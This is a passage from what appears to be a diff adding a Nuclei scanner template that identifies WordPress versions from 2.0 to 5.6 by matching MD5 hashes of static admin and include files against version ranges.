"(\"b45e420bae504bad3ad026f11fb34414\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-editor.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"b01941463721a9e3d36d4b4dc3781c66\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"d423a8f9152d19050b6020d0599e550b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"953fa7568d1de29bc722de0c8d27c59d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/light/colors.scss" + matchers: + - type: dsl + name: 4.3 - 5.6 + dsl: + - "(\"480b9bd647e5b323ef88d63ce55e1d6f\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"20a8567ba70294295c115f7ed9e071b7\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"d4534373ceb86fd1e1582d00de26bd81\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/blue/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"d9d03549d79484672c29145aad594db3\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"6220096c2fcaa516839e89b40744e911\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"5692871a8a7a1914ee0968ddf9923dec\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"11d1a9a671ccf4371372cc033a38e2d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"940171d1392bd8071122a905d12b9195\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"d09b41f68ac7247d47e79eaa6fb0e92c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/midnight/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"26dc8daaf0c47c4457b8bc2145f48634\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0d287edc7631906fabaaeec46f540111\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/bookmarklet.min.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"a91cd95baeb66d4873dbe424b75970c3\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b220cfa4b7eddb2b7340bf022cd4b41c\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"b7ee968190e961f9aefeddac25543c45\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"07603898b017e6cc23f7a5b90c003314\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/farbtastic.js" + matchers: + - type: dsl + name: 3.1 - 5.6 + dsl: + - "(\"a73af354a03241715d8698feea340b92\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"ba2afcd06915d8d312f7140c464938c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/bookmarklet.js" + matchers: + - type: dsl + name: 4.3 - 4.8.15 + dsl: + - "(\"95c9ef35b76af2aceaf9d6c5958e8d43\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"599601c1e1bcbf766f466722e50cb06b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/press-this.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"ceec025d4710581c8a0986860c8dfac9\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"18c78fc40d75f973159700ac6bbdd83a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"5491b59c4e2758920d933adf8661b068\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"682e5b74d3791a9c09b8c5317f84aa4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/press-this.js" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"f248f30a8a7d782d4e38962c8f0e6329\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"bac097de798345d068fd863c96b9ff41\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"91993a940f719edbe2ad8a259973527e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"9b4c722c56b2a7fa041c7a50f7019801\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"a881348ad82cd67fd3ede2686f8e9cfd\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"85199c05db63fcb5880de4af8be7b571\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"bedd695932ccf2f6c1d21471bf2e9228\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"dda0aa24705a5218d13e271c8c187cf7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-embed-template-ie.min.css" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"1aec3cac7756e9b405bcbf0ad39c7772\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"377b5750db4cf37b4897d918a90749e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/handlers.min.js" + matchers: + - type: dsl + name: 3.5.2 - 4.8.15 + dsl: + - "(\"96592c6b3fad580ce04e12bc3047ef3b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.1 + dsl: + - "(\"44b4f7cfec54b7fc8410a383257af538\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"6a8fbcda994be17e7109f588fcd8633d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/swfupload.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"6cd370bfd4d86c44ac155fd913e971ac\" == md5(body))" + - type: dsl + name: 4.0 - 4.6.20 + dsl: + - "(\"ef3ae9014525cf81187afaa61bca737e\" == md5(body))" + - type: dsl + name: 2.8 - 3.9.33 + dsl: + - "(\"603bd14299f61a7329b2d353b2b56c2f\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"79ada21b0ad56e6497057db7407c2480\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"2408a38cb26fd712e8cabee4da573075\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"ccd72399988bf939dce13e2659526711\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.form.js" + matchers: + - type: dsl + name: 3.7 - 4.8.15 + dsl: + - "(\"e5afd8e41d2ec22c19932b068cd90a71\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"1210dad363fcd0a43dc28244b69369f9\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"5b000ac69e0bc5325856cfe2ce588b88\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"958cc914d5beeebe517f7a1da5360ad5\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"2ff1a749aeaa2a874b8bd53960e982cc\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"820f80306571dbe0a1deb0b63496d85f\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"2bd31999f24a62d12a568fdbb8d43759\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"d08a6e3d69ffe1088166ae1983e2355d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/utils/mctabs.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0c3884be4fe9a43048f9c62d59dcda7f\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"b9b50ddbe07c754a6b656b0fdada3500\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"9f78248e9e0a64aa17f3062ce25099cb\" == md5(body))" + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"bd062418b6a7e5007649421815021565\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"80ef3cbbdea4cdb927d0b818fc936056\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"7727d6ef7c831c363ebfe40fc3f4e144\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"2a1823e4190de5b31bbfd48e51597448\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"84ef3a193d26119e8109afaae7a1c5e1\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"dfb2a3ae3f1f7d08232d64102bf6bf38\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"12a27164435afd5df1bbbb7eb3a15a01\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"eb81a1ec2259f9b1b4933e7855e5ada3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/farbtastic.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"30996981c129bd331b5cdbb88a2fa23b\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"23d55eb53a88478028930c82b13a6b0a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-icon.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"66a5336284db6dc9874764fa8548a471\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"1eb6581bc8d6bd4fc9c5b5d5a3f678df\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"6c951fcb811b78da4a91c55447888f98\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-icon.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"02f37c95552dc7cda5e2ca3c4ef6ac20\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"51ef2e5d648fb9b7bb4c2b88cfd25519\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"17ca77d176cb8d49591f32eab4c55d00\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"8d0ea8f47d8c45b2a80211d470306c75\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/farbtastic-rtl.min.css" + matchers: + - type: dsl + name: 3.8 - 4.8.15 + dsl: + - "(\"1a884c09637a47af300c7e6c3057ddc2\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"d55340e3ce5b935c2cf0337c92b61521\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-icon-rtl.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"52189e8f1862001b7bd1f5f0ed71d30a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b7bfe7d9aefb4e687d1e62eb70d658ac\" == md5(body))" + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"c5605f3fde843ddb7cf887a72b9464a8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/dailymotion.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"56dc9e4ca869b97225bcfc67152d234a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/soundcloud.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"8105bbb490f03094ec848fd4aaa986cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/facebook.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"7606b8a8ade2350f2dbff7e6ce992b1f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/twitch.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"a5185612b657eb6423add5755cb8a2bb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/twitch.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"90a049a82b0cc9a3c76755988df52e09\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/dailymotion.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"e01f0763e423742e0e0afeae2e685260\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/soundcloud.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"559517962c6329e56bd38132ee7322c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/facebook.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"4fdb5c45851d105d37bb178126f4a59c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-video.swf" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"88aeb3b7a5f3961393ffe6eb649a3a48\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-migrate.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"3cb6030743925f687ad3043384ed3c37\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mejs-controls.svg" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"f0849a5e79712b10e1531925e3edb879\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-video-hls.swf" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"b2dc69c327348b4774bcefb6f8aa0408\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-video-mdash.swf" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"dc64796b1bb9f9a40f5f2f874e821266\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-audio.swf" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"b56f0ff117c8eb507f1df12dc88663c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-audio-ogg.swf" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"c8890c74d2c904afd97022d20072f2b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mejs-controls.png" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"872edbb75a23651c30bf3ca06c9690bf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ko.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"96157f9a2d582a9b2f9d2d9036b91b69\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/pt.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"a9088bc020ad452490c511935e0b7d2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ru.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"12a4ed71d1eafbc02fae603e56c1892b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ro.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"d6326bd53b37582446b9789c30220193\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ca.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"27eaf272c68d547118ee6210c844bda6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/uk.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"ab2374f9cf8189d04fe13da19ebfa70e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/zh.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"cc7e0a8399c10d2a5df12c5d00154dec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ja.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"4b8f8f808a309dde6b7e9aef47b82a1f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/sv.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"13e15568b725b19b00469af61d239bc2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/es.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"bf5210c36107656b88bc010cf5c0a8a0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/nl.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"e2b8cba3dfcaf15dd32a28f52189ceba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/hr.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"862f150e2db5c2ef846a7a3296a67afd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/sk.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"b78e3fe643f1b04fd6b29cd76364ca89\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/hu.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"76ae0adf33f34cb9463e93b9e9e3069d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/zh-cn.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"5849066af233ae91cfc34700bb02d1b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/cs.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"cb39cbf670a82d0e52d40a9115c50149\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/fa.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"a738d9563af8c9f240c770422abab6d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/it.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"fd9c90d0291ab3a774d39556b7646c68\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/pl.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"94c0b3258c5a3b0241789c01321fd292\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/fr.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"cb69c7b0e31b37817f75bcaf446ec91a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/lang/de.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"eb110dabd02486e1f838b4b317f18487\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/moxie.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"8923430da19a35c7b1efc792b681fc9a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/htmlhint.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"b532ec7cd19faf478c4d740b5035a7ea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/codemirror.min.css" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"a632336ab79ded318dc02844c4faf3b5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/jshint.js" + matchers: + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"fa622859a12fe91067429a01c8158a04\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"9d84f61dfb50fa0321ec52716301cdca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/jsonlint.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"49296679dee36b0c548c2bcaed3cd59f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/codemirror.min.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"f2d20913fc0766828268883b66af71ec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/htmlhint-kses.js" + matchers: + - type: dsl + name: 4.9 - 5.6 + dsl: + - "(\"eefd81f25baeb66b5bf323634c667b1b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"5c509ea150c4abff1c5a288de7299c41\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"7e86c1cecc74753dcc8b63784c0815a3\" == md5(body))" + - type: dsl + name: 4.1 - 4.7.3 + dsl: + - "(\"1581bb02286f54b4fb0cce52d2ef61c7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"6956d77a2747ec8129e0c6f7bcfb1ced\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"cdb6a59abe551818e8a3a6d61b68e00e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/hr/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"a0a566612a12ce9069e89054bf2559b3\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"831204a97da9fa6b6784885a930a2743\" == md5(body))" + - type: dsl + name: 4.1 - 4.7.3 + dsl: + - "(\"5c23255ad2d11db3f72c33b649f1389a\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"dda52a147fa87063ac5b78dae4d8afa4\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"0911253e82299afa85c2950c033bb68f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/charmap/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"e21c5873be5aa8407266377225b67c26\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"318a17ced489d313fa5d74038ef540a0\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"bc5a8cc213bb3fe51b5673b64dd9d408\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"4c25dd1c151e1a2e3b196e8371404f03\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3231e7edd451f1950c2a856e68950399\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"218b586940473a3d64d408b22fa603ae\" == md5(body))" + - type: dsl + name: 4.2 - 4.3 + dsl: + - "(\"aeb8638d01b2c3c7fbf36e69893f4b25\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ac627e9017143d091eb11ab6cf1ee68b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"59afca0b460ebb487e2717c2df92cf96\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"35657b2be541481d479c3fb22192f2b1\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"3d42b6ec9f848bb610500d4cf6e2a00c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"451c40101c1a2f619c2d7dd4d6d0981f\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"3834eac105922686e034799a66a771cb\" == md5(body))" + - type: dsl + name: 3.9 - 4.7.3 + dsl: + - "(\"5798e3d2fb0180a9179b8bd7cf728eae\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"4c927b02ec9bc57017eab8d7b6dcd2a0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"6e485d9790488dcaf9f3f00dcf63f856\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"78302f1959b7a828bba2949c70ffe5f9\" == md5(body))" + - type: dsl + name: 4.1 - 4.7.3 + dsl: + - "(\"60de57253ca9143a6f1e4aff10fc39d2\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"241cedb5e02850e752c919a2cdc4153e\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"884572e84844add444b1c133a61f9a40\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/utils/validate.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"23a879a6f9b566ddb32810a3bcbd00e5\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"c42b5160bdbefd1293d76b30520757f4\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"681466e5980a5b99d9baeded56c67d34\" == md5(body))" + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"2d73c0757ea622f65738ea71433ca8e4\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"bc074582820655b7a729e7f92a206b66\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"6fc5abb84e8ba8ba87b12ad6806f48d1\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"5e365dba77123f9e7946af32055d2870\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"dcbd63050e6909b44e0d0c843ab5ff32\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"6ec1ea2ca3aed0b4b0e36fc9ac48db5a\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"3b909b4fa79d9e7e388561b097d13499\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"434cc20c313f6f2b033b84f8fb7b5986\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/spinner-2x.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"5c1371bcb4392968647852a9c9df5d6c\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"20ab276845ebcd6cfbf170fb82e8caf1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"de8c334862726c0a51cc0b3664b60035\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"31fd991e90e6329d865e23e638b50ff4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/spinner.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"b0a3dde331637e27aa6476d476481871\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"239a4f2d29907ca59c723e81c102e86c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0e12da48af1dbb4379e55c76dcb4f58d\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"d54cf50a44bd0aca6fd98bd46acbb2ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/resize.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"3fba1544df24f40dde5876c8c0aec461\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"897e92e82f6bc223783659c9237f40b6\" == md5(body))" + - type: dsl + name: 2.7 - 3.8.35 + dsl: + - "(\"68a8e57741df1a16444713a11d7c5b82\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"cbd61f6c4eed10fb1317038905abc4cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/resize-2x.gif" + 